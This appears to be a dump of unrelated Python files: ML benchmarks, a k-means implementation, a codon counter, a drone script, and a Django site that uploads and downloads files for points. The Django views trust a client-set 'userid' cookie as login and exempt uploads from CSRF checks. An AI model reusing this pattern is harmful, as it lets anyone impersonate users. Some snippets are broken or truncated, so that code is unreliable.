for s, S in enumerate(args.S):
print(' Running S = %d (value %d / %d)' % (S, s + 1, len(args.S)))
cur_results = {
'N': N, 'C': C, 'S': S,
'torch_cpu': [], 'torch_gpu': [], 'numpy_cpu': [], 'numpy_gpu': []
}
for t in range(args.num_trials):
times = run_trial(N, C, S, replacement)
for key, time_ms in times.items():
cur_results[key].append(time_ms)
all_results.append(cur_results)
with open(args.stats_json, 'w') as f:
json.dump(all_results, f)
def timeit(f, *args, **kwargs):
torch.cuda.synchronize()
t0 = time.time()
out = f(*args, **kwargs)
torch.cuda.synchronize()
t1 = time.time()
time_ms = (t1 - t0) * 1000.0
return time_ms
def numpy_multinomial(probs, num_samples, replacement=True):
N, C, S = probs.shape[0], probs.shape[1], num_samples
probs_np = probs.cpu().numpy()
samples = []
for i in range(N):
cur_probs = probs_np[i]
cur_samples = np.random.choice(C, size=S, replace=replacement, p=cur_probs)
samples.append(cur_samples[None])
samples = np.concatenate(samples, axis=0)
samples = torch.tensor(samples).long().to(probs.device)
return samples
def run_trial(N, C, S, replacement=True):
probs_cpu = torch.rand(N, C).softmax(dim=1)
probs_gpu = probs_cpu.cuda()
# We want to test torch and numpy on both cpu and gpu; randomize the order
# in which we call them to minimize any systematic effects of caching, etc
kwargs = {'replacement': replacement}
calls = [
['torch_cpu', torch.multinomial, (probs_cpu, S), kwargs],
['torch_gpu', torch.multinomial, (probs_gpu, S), kwargs],
['numpy_cpu', numpy_multinomial, (probs_cpu, S), kwargs],
['numpy_gpu', numpy_multinomial, (probs_gpu, S), kwargs],
]
random.shuffle(calls)
results = {}
for key, f, args, kwargs in calls:
results[key] = timeit(f, *args, **kwargs)
return results
if __name__ == '__main__':
args = parser.parse_args()
main(args)
|
choicify = lambda lst: [(s, s) for s in lst]
|
#coding:utf-8
from django.shortcuts import render_to_response
from django.template.context import RequestContext
from django.http.response import HttpResponse, StreamingHttpResponse
import json
from resources.dao import select_resources, uploadFile,\
select_Cresource, rsUpdateDao
from django.views.decorators.csrf import csrf_exempt
from subject.models import User, Source
from activity.dao import activityDao
from login.dao import userDao
from subject import settings
def into_resources(req):
return render_to_response('resources.html',RequestContext(req))
def get_resources(req):
p = int(req.GET.get('p'))
cur = p
rs = {}
if p==0:
cur = 1
cn = select_Cresource()
rs['numT'] = cn
us = None
if req.COOKIES.has_key("userid"):
us = req.COOKIES["userid"]
rs['res'] = select_resources(cur,us)
return HttpResponse(json.dumps(rs),content_type="application/json")
@csrf_exempt
def upload_resources(req):
if req.COOKIES.has_key('userid'):
file = req.FILES['uploadedfile'] # @ReservedAssignment
points = req.POST['points']
filename = req.POST['filename'].encode('utf-8')
if file:
userid = req.COOKIES['userid'].decode('utf-8').encode('utf-8')
uploadFile({'userid':userid,'file':file,'filename':filename,'points':points})
content = ' 上传资源:' + filename
ADao = activityDao({"userid":userid})
ADao.add_a_activity(content.decode('utf-8'))
return HttpResponse(json.dumps({'tips':'上传成功'}),content_type="application/json")
return HttpResponse(json.dumps({'tips':'上传失败or未登录'}),content_type="application/json")
'''
下载时的积分处理:
1.获取登录信息:成功,下一步;失败,返回错误信息
2.获取传递参数
3.判断下载者积分:充足,下一步;否,返回错误信息
4.减少下载者积分,增加上传者积分
5.返回空白json
'''
# @csrf_exempt
def download_resources(req):
if req.COOKIES.has_key('userid'):
resourceID = int(req.GET.get('rs'))
downloader = req.COOKIES['userid']
dao = Source.objects.get(id=resourceID)
downloadPoint = dao.points
uploader = dao.userid
# downloadPoint = int(req.POST["points"])
# uploader = int(req.POST["uploader"])
# resourceID = int(req.POST["resourceID"])
if User.objects.filter(id=downloader,points__gte=downloadPoint):
dao = userDao({'userid':downloader})
dao.update_point_byReq({'method':'-','points':downloadPoint})
dao.save_update()
dao = userDao({'us':uploader})
dao.update_point_byReq({'method':'+','points':downloadPoint})
dao.save_update()
dao = rsUpdateDao(rsid=resourceID)
count = dao.update_content()
dao.update_save()
content = (' 下载资源: ').decode("utf-8") + dao.rs.download
downloadPath = settings.MEDIA_ROOT+dao.rs.download
ADao = activityDao({"userid":downloader})
ADao.add_a_activity(content)
def file_iterator(file_name, chunk_size=512):
with open(file_name) as f:
while True:
c = f.read(chunk_size)
if c:
yield c
else:
break
response = StreamingHttpResponse(file_iterator(downloadPath))
response['Content-Type'] = 'application/octet-stream'
response['Content-Disposition'] = 'attachment;filename="{0}"'.format(dao.rs.download) #默认文件名
return response
# return HttpResponse(json.dumps({'resourceID':resourceID,"count":count,'dURL':downloadURL}),content_type="application/json")
return HttpResponse('积分不足')
return HttpResponse('请先登录') |
# coding: utf-8
def retrain(data):
"""
/var/opt/xgboost
|- 00000000000/
|- model
|- lock
|- 11397283704/
...
"""
import xgboost as xgb
import numpy as np
from os.path import abspath, dirname, join
import sys
sys.path.insert(0, join(dirname(dirname(abspath(__file__))), 'modules'))
import utils
sys.path.pop(0)
XGBOOST_DIR = '/var/opt/xgboost'
latest_dir = utils.get_latest_dir(XGBOOST_DIR)
if latest_dir is not None:
base_model = xgb.Booster()
base_model.load_model('{}/model'.format(latest_dir))
else:
base_model = None
# retrain model
X = np.array([d[1:] for d in data])
y = np.array([d[0] for d in data])
dataset = xgb.DMatrix(X, label=y)
params = {
'max_depth': 5,
'eta': 0.1,
'objective': 'binary:logistic',
'silent': 0
}
model = xgb.train(params, dataset, 30, [], xgb_model=base_model)
# save model
new_dir = utils.create_child_dir(XGBOOST_DIR)
model.save_model('{}/model'.format(new_dir))
import time
time.sleep(10)
utils.commit_dir(new_dir)
def fetch():
pass
def main(rpc_service,
continuum_host='localhost',
continuum_port=7001,
redis_host='localhost',
redis_port=6379,
backend_name='xgboost',
backend_version='1.0',
backend_module='xgboost_entries',
app_name='xgboost-app',
policy_name='NaiveBestEffortPolicy',
input_type='doubles',
params={},
**kwargs):
params['alpha'] = params['alpha'] if 'alpha' in params else 4.0
params['beta'] = params['beta'] if 'beta' in params else 10000.0
rpc_service.start(continuum_host, continuum_port, backend_name, backend_version, redis_host, \
redis_port, backend_module, app_name, policy_name, input_type, params)
|
# Read this https://docs.python.org/3/howto/sorting.html
# Sort examples, from above link. For my own silly testing.
from operator import itemgetter, attrgetter
student_tuples = [('john', 'A', 15), ('jane', 'B', 12), ('dave', 'B', 10)]
# sorted_list = sorted(student_tuples, key=lambda student: student[2])
sorted_list = sorted(student_tuples, key=itemgetter(2))
print("Sorted with tuples: " + str(sorted_list))
class Student:
def __init__(self, name, grade, age):
self.name = name
self.grade = grade
self.age = age
def __repr__(self):
return repr((self.name, self.grade, self.age))
student_objects = [Student('john', 'A', 15), Student('jane', 'B', 12), Student('dave', 'B', 10)]
# object_sorted_list = sorted(student_objects, key=lambda student: student.age)
object_sorted_list = sorted(student_objects, key=attrgetter('age'))
print("Sorting objects: " + str(object_sorted_list))
# multi_sorted = sorted(student_tuples, key=itemgetter(1,2))
multi_sorted = sorted(student_objects, key=attrgetter('age', 'grade'))
print("Multiple sorts looks like this: " + str(multi_sorted))
|
#IanNolon
#4/26/28
#vowelWordDemo.py- treat strings as lists
words = input('Type in a list of words: ').split(' ')
for w in words:
if w[0] in 'AEIOUaeiou': #if it starts with a 🅱owel
print(w)
|
#!/usr/bin/env python
# coding: utf-8
import sklearn
import joblib
from sklearn.datasets import make_classification
dataset = make_classification(n_samples=10000, n_features=75, n_informative=55, n_redundant=10, n_classes=10)
from sklearn.ensemble import RandomForestClassifier
rf_model = RandomForestClassifier(n_estimators=30000, max_depth=50, n_jobs=-1)
rf_model.fit(dataset[0], dataset[1])
joblib.dump(rf_model, 'rf.joblib')
|
#Auteur Tom
import os
from tkinter.filedialog import askdirectory
import pickle
import matplotlib.pyplot as plt
import re
def openfiles():
'''
Openen van een folder voor het zoeken naar bestanden.
Als het zoekwoord (Variabele searchterm) in de bestandnaam zit stuurt die hem door naar de readfiles functie.
'''
searchterm = "CDS.fasta" #input("Wat moet er in de bestandsnaam staan?: ")
for path, dirs, files in os.walk(askdirectory()):
for subfile in files:
if searchterm in subfile:
newpath = path + "\\" + subfile
readfiles(newpath)
def readfiles(filepath):
'''
Functie accepteerd een filepath en zorgt voor het openen van dit bestand.
Daarna zal deze functie de headers en sequenties scheiden in 2 verschillende lijsten.
Deze lijsten, samen met de filename worden naar de codoncounter gestuurd.
'''
headers = []
seqs = []
tempseq = ''
#pause = input("".join((filepath.split('\\'))[-1:])) # Deze lijn was/is voor debuggen
with open(filepath) as file:
for line in file:
if line[0] == '>':
headers.append(line.rstrip())
if tempseq != '':
seqs.append(tempseq)
tempseq = ''
else:
tempseq += line.rstrip()
seqs.append(tempseq)
codoncounter(headers, seqs, "".join((filepath.split('\\'))[-1:]))
def codoncounter(headers, seqs, filename):
'''
Accepteerd een header en sequentielijst samen met de filename.
Met behulp van een codon dictionary worden de sequenties doorzocht voor codons.
De gevonden codons worden aan een andere dictionary toegevoegd.
De aangemaakte dictionary gaat naar de dictprocessor functie om verder te worden verwerkt en gesorteerd.
'''
start = 0
stop = 3
headercount = 0
with open("TemplateDict.dat", "rb") as usagefile:
usagedict = pickle.load(usagefile)
with open("CodonDict.dat","rb") as CodonFile:
codonDict = pickle.load(CodonFile)
for seq in seqs:
seq = seq.lower()
if re.search("gene=env", headers[headercount]) == None: #aanpassen als je ENV zoekt of wat anders.
for x in range(int((len(seq)-len(seq)%3)/3)):
for key in codonDict:
if key == seq[start:stop]:
try:
usagedict[codonDict[key]].append("{} {}".format(codonDict[key], key))
except KeyError:
usagedict[codonDict[key]] = ["{} {}".format(codonDict[key], key)]
start+=3
stop +=3
break
headercount += 1
start = 0
stop = 3
dictprocessor(usagedict, "="*40, filename)
def dictprocessor(usagedict, header, filename):
'''
De dictprocessor functie verwerkt de voorheen gemaakte dictionary tot een alfabetisch gesorteerde dictionary.
De key:value paren zijn: Aminozuurletter:([codons],[aantalcodon]) voor (in theorie) makkelijke verwerking met matplotlib.
Deze dictionary gaat naar de pickledump functie.
'''
tempcount = []
tempcodon = []
sorteddict = {}
for key in usagedict:
unsortedset = set(usagedict[key])
sortedset = sorted(unsortedset)
for thing in sortedset:
tempcodon.append(thing)
tempcount.append(usagedict[key].count(thing))
sorteddict[key] = tempcodon,tempcount
tempcount = []
tempcodon = []
pickledump(sorteddict, header, filename)
def pickledump(codondict, header, filename):
'''
Dumpt alle dictionaries naar een pickle bestand voor latere verwerking.
'''
with open("CodonUsageDict {}.dat".format("".join((filename.split('.'))[0])), "wb") as file:
pickle.dump(codondict, file)
openfiles()
|
import pandas as pd
class InputData:
def __init__(self):
# Read relevant files
data = pd.read_excel('data/data_to_transform.xlsx')
description = open('data_descriptions/data_to_transform_description.txt', 'r')
# region Perform checks if the data was correctly entered
error_dict = {'columns': 'Please be sure to use the correct column names and that they are lower case',
'age': 'Please use age values between 0 and 125 years, and only use integer values',
'sex': 'Please assure the following encoding: Male = 1, Female = 2',
'education': 'Please use education levels that are encoded as 6, 12, 13, 15, 17 or 21 years',
'sdmt': 'Please use sdmt values between 0 and 110',
'bvmt': 'Please use bvmt values between 0 and 36',
'cvlt': 'Please use cvlt values between 0 and 80'}
allowed_range_dict = {'columns': {'age', 'sex', 'education', 'sdmt', 'bvmt', 'cvlt'},
'age': set(range(0,126)),
'sex': {1,2},
'education': {6,12,13,15,17,21},
'sdmt': set(range(0,111)),
'bvmt': set(range(0,37)),
'cvlt': set(range(0,81))}
for key in ['columns'] + list(data.columns):
# Extract the data vector for a specific key
if key == 'columns':
input_vector = set(data.columns)
else:
input_vector = set(data[key])
# Check whether the vector is within the allowed range
if not input_vector.issubset(allowed_range_dict.get(key)):
raise ValueError(error_dict.get(key))
# endregion
# add age^2 column as second column to the data
age_2 = data['age']**2
data.insert(loc=1, column='age^2', value=age_2) # insert age^2 column in second position (thus loc = 1)
# Create the attributes
self.data_all = data
self.demographics = data[['age','age^2','sex','education']]
self.cognitive = data.drop(['age','age^2','sex','education'], axis=1)
self.columns = data.columns
self.description = description.read()
class ConversionTable:
def __init__(self):
# Read relevant files
data_sdmt = pd.read_csv('data/conversion_tables/sdmt_conversion_table.csv')
data_bvmt = pd.read_csv('data/conversion_tables/bvmt_conversion_table.csv')
data_cvlt = pd.read_csv('data/conversion_tables/cvlt_conversion_table.csv')
description = open('data_descriptions/conversion_table_description.txt')
# Create the attributes
self.sdmt = data_sdmt
self.bvmt = data_bvmt
self.cvlt = data_cvlt
self.description = description.read()
|
__author__ = "Narwhale"
from core import auth
# user_data = {
# 'account_id':None,
# 'is_authenticated':False,
# 'account_data':None
# }
def interactive():
'''
此函数为与客户的交互模块,打印选项供客户选择。
:return:
'''
print('你好!')
def run():
'''
这个函数主要执行运登录程序以及执行与客户的交互
:return:
'''
select = '''
--------选项---------
1.登录
2.注册
'''
print(select)
user_select = input('请输入你的选择:')
selsct_dict = {'1':'auth.acc_login()','2':'auth.acc_enroll()'}
if user_select in selsct_dict:
acc_data = eval(selsct_dict[user_select])
if acc_data:
interactive()
else:
print('超出选项')
|
#/usr/bin/env python
from gnuradio import gr
import serial
import threading
import time
import numpy
# Hardware addresses for Single Board Heater System components
FAN_ADDR = 253
HEATER_ADDR = 254
TEMPSENSOR_ADDR = 255
class sbhs_module(gr.hier_block2, threading.Thread):
def __init__(self, samp_rate, fan_speed, heater_temp):
gr.hier_block2.__init__(self, 'sbhs_module', gr.io_signature(0,0,0), gr.io_signature(1,1,gr.sizeof_float))
self.init_serial()
self.set_samp_rate(samp_rate)
self.set_fan_speed(fan_speed)
self.set_heater_temp(heater_temp)
message_source = gr.message_source(gr.sizeof_int,1)
self._msgq = message_source.msgq()
self.connect(message_source, self)
threading.Thread.__init__(self)
self.setDaemon(True)
self.start()
def run(self):
while True:
time.sleep(1.0/self._samp_rate)
temp = self.get_temp_from_sensor()
self._msgq.insert_tail(temp)
def write_serial(self, hw_addr, val):
self._serial.write(chr(hw_addr))
self._serial.write(chr(val))
def init_serial(self):
self._serial = serial.Serial('/dev/ttyUSB0', 9600)
self._serial.open()
def get_temp_from_sensor(self):
self._serial.write(chr(TEMPSENSOR_ADDR))
temp_val = map(ord, self._serial.read(2))
temp_string = str(temp_val[0]) + str(temp_val[1])
arr = numpy.array(float(temp_string)/10.0, numpy.float32)
print "Read Temperature from Sensor: %s" %(arr)
return gr.message_from_string(arr.tostring(), 0, gr.sizeof_float, 1)
def set_samp_rate(self, samp_rate):
self._samp_rate = samp_rate
def set_fan_speed(self, fan_speed):
self._fan_speed = fan_speed
print "Setting Fan Speed: %d" %(fan_speed)
self.write_serial(FAN_ADDR, self._fan_speed)
def set_heater_temp(self, heater_temp):
self._heater_temp = heater_temp
print "Setting Heater Temp: %d" %(heater_temp)
self.write_serial(HEATER_ADDR, self._heater_temp)
|
__authors__ = ['1531206','1456135', '1533031']
__group__ = 'GrupDM12'
import numpy as np
import pandas
import utils
import matplotlib.pyplot as plt
from sklearn.metrics import silhouette_score
from sklearn.metrics.pairwise import euclidean_distances
from scipy.spatial.distance import pdist
import numpy_indexed as npi
class KMeans:
def __init__(self, X, K=1, options=None):
"""
Constructor of KMeans class
Args:
K (int): Number of cluster
options (dict): dictºionary with options
"""
self.num_iter = 0
self.K = K
self._init_options(options)
self._init_X(X)
def _init_X(self, X):
"""Initialization of all pixels, sets X as an array of data in vector form (PxD)
Args:
X (list or np.array): list(matrix) of all pixel values
if matrix has more than 2 dimensions, the dimensionality of the sample space is the length of
the last dimension
"""
if len(X.shape) == 2:
self.X = X
else:
self.X = X.reshape((X.shape[0] * X.shape[1], X.shape[2]))
# Delete unnecessary filthy background
indexes = np.where(np.mean(self.X, 1) < self.options['background_mask'])
self.X = self.X[indexes[0]]
if self.X.dtype != np.float64:
self.X = self.X.astype('float64')
def _init_options(self, options=None):
"""
Initialization of options in case some fields are left undefined
Args:
options (dict): dictionary with options
"""
if options == None:
options = {}
if 'km_init' not in options:
options['km_init'] = 'first'
if 'verbose' not in options:
options['verbose'] = False
if 'tolerance' not in options:
options['tolerance'] = 0
if 'max_iter' not in options:
options['max_iter'] = np.inf
if 'fitting' not in options:
options['fitting'] = 'WCD'
if 'threshold' not in options:
options['threshold'] = 0.2
if 'background_mask' not in options:
options['background_mask'] = 250
self.options = options
def _init_centroids(self):
"""
Initialization of centroids
"""
if self.options['km_init'].lower() == 'first':
_, idx = np.unique(self.X, return_index=True, axis=0)
self.centroids = self.X[np.sort(idx)]
self.centroids = self.centroids[:self.K]
elif self.options['km_init'].lower() == 'random':
self.centroids = np.random.rand(self.K, self.X.shape[1]) * 255
# Funciona bé però pot portar a casos amb empty clusters
elif self.options['km_init'].lower() == 'sharding':
attributes_sum = np.sum(self.X, 1)
ordering_indexes = np.argsort(attributes_sum)
ordered_x = self.X[ordering_indexes]
splits = np.array_split(ordered_x, self.K)
self.centroids = np.empty((self.K, self.X.shape[1]), dtype='float64')
for p in range(self.K):
self.centroids[p] = np.mean(splits[p], 0)
elif self.options['km_init'].lower() == 'kmeans++':
shape = self.X.shape[0]
self.centroids = np.empty((self.K, self.X.shape[1]), dtype='float64')
self.centroids[0] = self.X[np.random.randint(shape), :]
for k in range(1, self.K):
distances = np.amin(distance(self.X, self.centroids), axis=1)
self.centroids[k] = self.X[np.argmax(distances), :]
self.old_centroids = np.empty_like(self.centroids)
def get_labels(self):
"""
Calculates the closest centroid of all points in X
and assigns each point to the closest centroid
"""
distances = distance(self.X, self.centroids)
self.labels = np.argmin(distances, axis=1)
self.labels_distances = np.amin(distances, axis=1)
def get_centroids(self):
"""
Calculates coordinates of centroids based on the coordinates of all the points assigned to the centroid
"""
self.old_centroids = np.array(self.centroids)
for k in range(self.K):
if (self.labels == k).sum() > 0:
self.centroids[k] = np.mean(self.X[self.labels == k], axis=0)
def converges(self):
"""
Checks if there is a difference between current and old centroids
"""
return np.allclose(self.centroids, self.old_centroids, self.options["tolerance"])
def fit(self):
"""
Runs K-Means algorithm until it converges or until the number
of iterations is smaller than the maximum number of iterations.
"""
self.num_iter = 0
self._init_centroids()
while not self.converges() and self.num_iter < self.options["max_iter"]:
self.get_labels()
self.get_centroids()
self.num_iter += 1
def within_class_distance(self):
"""
returns the whithin class distance of the current clustering
"""
clusters = npi.group_by(self.labels).split(self.X)
sumup = 1.0
for i in range(len(clusters)):
sumup += np.nanmean(euclidean_distances(clusters[i], clusters[i]))
return sumup
def within_class_distance_fast(self):
"""
returns a faster variant of the whithin class distance of the current clustering
"""
return np.mean(self.labels_distances)
def inter_class_distance(self):
"""
returns the inter class distance of the current clustering
"""
clusters = npi.group_by(self.labels).split(self.X)
sumup = 1.0
for i in range(len(clusters)):
for j in range(i, len(clusters)):
if i != j:
sumup += np.mean(euclidean_distances(clusters[i], clusters[j]))
return sumup
def inter_centroids_distance(self):
"""
returns the inter centroids distance of the current clustering
"""
return np.mean(euclidean_distances(self.centroids, self.centroids))
def davis_bouldin_score(self):
"""
returns the davis bouldin score of the current clustering
"""
sumup = 1
split_distances = npi.group_by(self.labels).split(self.labels_distances)
for i in range(len(split_distances)):
mean_distance_i = np.mean(split_distances[i])
for j in range(i, len(split_distances)):
mean_distance_j = np.mean(split_distances[j])
if i != j:
dist = self.centroids[i] - self.centroids[j]
sumup += (mean_distance_i + mean_distance_j) / (dist * dist).sum()
return sumup / self.K
def silhouette_score(self):
"""
returns the silhouette score of the current clustering
"""
a = self.within_class_distance()
b = self.inter_class_distance()
return (b-a) / max(a,b)
def fisher_score(self):
"""
returns the fisher score of the current clustering
"""
a = self.within_class_distance()
b = self.inter_class_distance()
return a/b
def perform_score(self):
if self.options['fitting'] == "WCD":
return self.within_class_distance()
elif self.options['fitting'] == "ICD":
return self.inter_class_distance()
elif self.options['fitting'] == "DB":
return self.davis_bouldin_score()
elif self.options['fitting'] == "fisher":
return self.fisher_score()
elif self.options['fitting'] == "silhouette":
return self.silhouette_score()
def find_bestK(self, max_K):
"""
sets the best k anlysing the results up to 'max_K' clusters
"""
best_k = self.K
self.K = 1
self.fit()
# For some reason, python erases from the existance the labels in some rare exceptional cases...
while not hasattr(self, 'labels'):
self.fit()
score = self.perform_score()
for k in range(2, max_K+1):
self.K = k
self.fit()
new_score = self.perform_score()
if self.options['fitting'] == "silhouette":
if new_score < score or k == max_K:
best_k = k-1
break
elif self.options['fitting'] == "ICD":
if (new_score/score - 1) < self.options['threshold'] or k == max_K:
if k == max_K:
best_k = k
else:
best_k = k-1
break
else:
if (1 - new_score/score) < self.options['threshold'] or k == max_K:
if k == max_K:
best_k = k
else:
best_k = k-1
break
score = new_score
self.K = best_k
def distance(X, C):
"""
Calculates the distance between each pixcel and each centroid
Args:
X (numpy array): PxD 1st set of data points (usually data points)
C (numpy array): KxD 2nd set of data points (usually cluster centroids points)
Returns:
dist: PxK numpy array position ij is the distance between the
i-th point of the first set an the j-th point of the second set
"""
dist = X[:, :, None] - C[:, :, None].T
return (np.square(dist)).sum(1)
def get_colors(centroids):
"""
for each row of the numpy matrix 'centroids' returns the color laber folllowing the 11 basic colors as a LIST
Args:
centroids (numpy array): KxD 1st set of data points (usually centroind points)
Returns:
lables: list of K labels corresponding to one of the 11 basic colors
color_probs: color probabilities
"""
probs = utils.get_color_prob(centroids)
# probs_max_args = np.argsort(probs.max(1)[::-1])
# color_probs = probs.max(1)[probs_max_args]
# probs_argmax = probs.argmax(1)[probs_max_args]
return utils.colors[probs.argmax(1)] |
from bsm.util import ensure_list
PATH_ENV = {
'bin': 'PATH',
'lib': 'LD_LIBRARY_PATH',
'man': 'MANPATH',
'info': 'INFOPATH',
'pkgconfig': 'PKG_CONFIG_PATH',
'cmake': 'CMAKE_PREFIX_PATH',
'python': 'PYTHONPATH',
'marlin': 'MARLIN_DLL',
}
def run(param, cfg):
name = param['name']
category = param['category']
cfg.setdefault('env', {})
cfg['env'].setdefault('set_env', {})
cfg['env']['set_env'].setdefault(name+'_HOME', '{install}')
if category != 'data' and 'source' not in cfg.get('clean', []):
cfg['env']['set_env'].setdefault(name+'_SOURCE', '{source}')
if 'bin' in cfg.get('path', {}):
cfg['env']['set_env'].setdefault(name+'_BIN', '{bin}')
if 'lib' in cfg.get('path', {}):
cfg['env']['set_env'].setdefault(name+'_LIB', '{lib}')
if 'inc' in cfg.get('path', {}):
cfg['env']['set_env'].setdefault(name+'_INCLUDE', '{inc}')
cfg['env'].setdefault('prepend_path', {})
for k, v in PATH_ENV.items():
if k in cfg.get('path', {}):
cfg['env']['prepend_path'][v] = ensure_list(cfg['env']['prepend_path'].get(v, []))
cfg['env']['prepend_path'][v].append('{{{0}}}'.format(k))
|
from django.conf.urls import url
from djofx import views
urlpatterns = [
url(r'^(?P<pk>\d+)/$', views.account_detail, name="djofx_account"),
url(
r'^(?P<pk>\d+)/unverified/$',
views.account_detail,
{'unverified': True},
name="djofx_account_unverified"
),
]
|
import unittest
from katas.beta.replace_multiples_with_string import getNumber, getNumberRange
class ReplaceMultiplesWithStringTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(getNumber(0), 'BOTH')
def test_equals_2(self):
self.assertEqual(getNumber(1), 1)
def test_equals_3(self):
self.assertEqual(getNumber(2), 2)
def test_equals_4(self):
self.assertEqual(getNumber(3), 'THREE')
def test_equals_5(self):
self.assertEqual(getNumber(4), 4)
def test_equals_6(self):
self.assertEqual(getNumber(5), 'FIVE')
def test_equals_7(self):
self.assertEqual(getNumber(10), 'FIVE')
def test_equals_8(self):
self.assertEqual(getNumber(15), 'BOTH')
def test_equals_9(self):
self.assertEqual(getNumber(18), 'THREE')
def test_equals_10(self):
self.assertEqual(getNumber(19), 19)
def test_equals_11(self):
self.assertEqual(getNumber(30), 'BOTH')
def test_equals_12(self):
self.assertEqual(getNumber(150), 'BOTH')
def test_equals_13(self):
self.assertEqual(getNumber(-1), -1)
def test_equals_14(self):
self.assertEqual(getNumber(-3), 'THREE')
def test_equals_15(self):
self.assertEqual(getNumber(-15), 'BOTH')
def test_equals_16(self):
self.assertEqual(getNumber(-50), 'FIVE')
def test_equals_17(self):
self.assertEqual(getNumberRange(1, 15), [
1, 2, 'THREE', 4, 'FIVE', 'THREE', 7, 8, 'THREE', 'FIVE', 11,
'THREE', 13, 14, 'BOTH'
])
def test_equals_18(self):
self.assertEqual(getNumberRange(1, -15), [
1, 'BOTH', -1, -2, 'THREE', -4, 'FIVE', 'THREE', -7, -8,
'THREE', 'FIVE', -11, 'THREE', -13, -14, 'BOTH'
])
|
from sklearn import neighbors
from sklearn.model_selection import StratifiedShuffleSplit, GridSearchCV
import tensorflow as tf
from tensorflow import keras
def knn(X, Y, seed):
"""Return a K-NN model, fitted with the best parameters found using cross-validation and grid search."""
model = neighbors.KNeighborsClassifier(algorithm='auto')
param_grid = {'n_neighbors': [1, 5, 9, 13, 17, 21, 25, 29, 33, 37], 'weights': ['uniform', 'distance']}
# Grid search on the parameters, to find the best score.
k = 3
split = StratifiedShuffleSplit(n_splits=k, random_state=seed)
search = GridSearchCV(model, param_grid, cv=split, scoring="f1")
search.fit(X,Y)
score = search.best_score_
model = search.best_estimator_
print("score={}\nModel: {}".format(score, model))
return model
def neural_net(X, Y):
"""Return a trained Neural Network."""
model = keras.Sequential([
keras.layers.Dense(32, input_dim=len(X[0])),
keras.layers.Activation("relu"),
keras.layers.Dense(32),
keras.layers.Activation("relu"),
keras.layers.Dense(128),
keras.layers.Activation("relu"),
keras.layers.Dense(128),
keras.layers.Activation("relu"),
keras.layers.Dense(32),
keras.layers.Activation("relu"),
keras.layers.Dense(1, activation='sigmoid')
])
# Use the adam optimizer
adam = keras.optimizers.Adam(lr=0.01)
model.compile(optimizer='adam', loss='mean_squared_error', metrics=['accuracy'])
# Training
model.fit(X, Y, epochs=20, validation_split=0.1)
return model
|
#!/usr/bin/env python
import time
from flyt_python import api
drone = api.navigation(timeout=120000) # instance of flyt droneigation class
# at least 3sec sleep time for the drone interface to initialize properly
time.sleep(3)
print 'taking off'
drone.take_off(5.0)
print ' going along the setpoints'
drone.position_set(5, 0, 0, relative=True)
drone.position_set(0, 5, 0, relative=True)
drone.position_set(-5, 0, 0, relative=True)
drone.position_set(0, -5, 0, relative=True)
print 'Landing'
drone.land(async=False)
# shutdown the instance
drone.disconnect()
|
import numpy as np
import torch
import os
import pickle
import utils
from torch.utils.data import Dataset, TensorDataset, DataLoader
import matplotlib.pyplot as plt
import time
# ======================================================================================================================
# Define proj_M_L2O Operator
# ======================================================================================================================
def proj_M_L2O(u_gen0, list_J, his_wass, gamma_constant, alpha, step_type, device):
# u_gen = initial image(s)
# list_J = list of pre-trained weights
# his_wass = list of Wasserstein distances/Average distances
# gamma_constant = scalar multiplying gamma_k sequence
# alpha = constant for step size in (0,1)
# require grad for computing nablaJ
u_gen = u_gen0.detach().clone()
u_gen.requires_grad_(True)
n_samples = u_gen.shape[0]
start_time = time.time()
# perform relaxed projections
for gen_iter in range(1, num_gen):
Jout = list_J[gen_iter](u_gen) # n_samples x 1
# take derivative w.r.t only inputs
nablaJ = torch.autograd.grad(outputs=Jout, inputs=u_gen,
grad_outputs=torch.ones(Jout.size()).to(device), only_inputs=True)[0].detach()
gamma_gen_iter = gamma_constant / gen_iter
anchor = gamma_gen_iter * u_gen0
# step size, combines general and individual step size
if step_type == 'Mean':
lam = alpha * (his_wass[gen_iter - 1])
elif step_type == 'Combined':
lam = alpha * (his_wass[gen_iter - 1] + torch.max(Jout.detach(), torch.zeros(Jout.size(), device=device)))
elif step_type == 'Individual':
lam = alpha * (torch.max(Jout.detach(), torch.zeros(Jout.size(), device=device)))
# lambda * gradient term; reshape to multiply by lam, then reshape back
lam_gradient_term = (lam * (nablaJ.reshape(n_samples, -1))).reshape(u_gen.shape)
u_gen = anchor + (1 - gamma_gen_iter) * (u_gen - lam_gradient_term)
end_time = time.time()
# print(f'proj_M_L2O time: {end_time - start_time}')
u_gen = u_gen.detach()
return u_gen
# ======================================================================================================================
# Load Validation Set
# ======================================================================================================================
CTEllipses_folder = './CTEllipse/experimentsEllipse/'
dataset_path = CTEllipses_folder + 'ellipses__val_size-1000_tv_lam-0.001__beams-30__noise-0.025__july-16-2020.pkl'
experiment_path = './CTEllipse/experimentsEllipse/' \
'ellipseCT_2020-10-04-11-16-01_lr1e-05_genFreq200_nTrain10000_batchSize16_optimADAM_etaFreq20_gamma_const1e-01_etaTol1e-05_noise_level5e-03_alpha5e-01_gp_lam20_distMan_lam1e-01_lr_decay_iter50doAugment0_architectureHuber_stepTypeMean_tvlam001'
# proj_M_L2O constants (based on experiment_path)
gamma_constant = 1e-1
alpha = 0.5
step_type = 'Mean'
image_scaling = 'unit'
data_range = {"unit": 1.0, "symmetric": 2.0}
device = 'cpu'
from adversarial_networks import discriminator_net_Huber as discriminator_net; architecture = 'Huber' # USING FC at the end
with open(dataset_path, 'rb') as f:
load_dataset = pickle.load(f)
b_data = load_dataset['y']
u_true = load_dataset['x_true']
u_gen0 = load_dataset['tv']
# swap dimensions so that u_train is n_samples x n_channels x n_feature1 x n_feature2
b_data = np.transpose(b_data, [0, 3, 1, 2])
u_true = np.transpose(u_true, [0, 3, 1, 2])
u_gen0 = np.transpose(u_gen0, [0, 3, 1, 2])
print("u_true.shape = ", u_true.shape)
print("u_gen0.shape = ", u_gen0.shape)
print("b_data.shape = ", b_data.shape)
# Renormalize everything to the unit interval [0,1]
# for idx in range(u_gen0.shape[0]):
# u_gen0[idx] = utils.scale_to_interval(u_gen0[idx], image_scaling)
# ======================================================================================================================
# Choose image(s) to be projected
# ======================================================================================================================
ind_val1 = 80
# ind_val1 = 100
# ind_val1 = 110
# ind_val1 = 1000
# ind_val1 = 1001
n_images = ind_val1 + 1
# ind_val1 = 0
# n_images = 1000
b_data = torch.FloatTensor(b_data[ind_val1:n_images,:,:,:]) ##################################################################
u_true = torch.FloatTensor(u_true[ind_val1:n_images,:,:,:]) ##################################################################
